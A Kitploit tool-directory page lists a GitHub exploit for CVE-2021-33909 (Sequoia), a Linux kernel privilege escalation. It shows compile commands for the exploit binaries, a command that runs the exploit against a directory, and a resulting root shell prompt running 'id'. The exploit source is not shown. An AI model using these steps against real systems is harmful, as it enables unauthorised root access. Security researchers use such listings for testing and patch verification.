Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-33909 — CVE-2021-33909 Sequoia | Kitploit
Tools/GitHubGitHub/christhecoolhut/cve-2021-33909
Privilege EscalationVulnerability AnalysisExploitationBinary Exploitation
GitHubchristhecoolhut/cve-2021-33909

CVE-2021-33909

CVE-2021-33909 Sequoia

View Repository
44155 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-33909 Sequoia

Writeup

root@kitploit:~
gcc exploit.c -o exploit -lpthread -DBLOCK_VIA_USERFAULTFD
gcc exploit.hello.c -o exploit.hello -lpthread -lfuse -D_FILE_OFFSET_BITS=64
root@kitploit:~
$ mkdir dir
$ ./exploit $(pwd)/dir
# id
Download Tool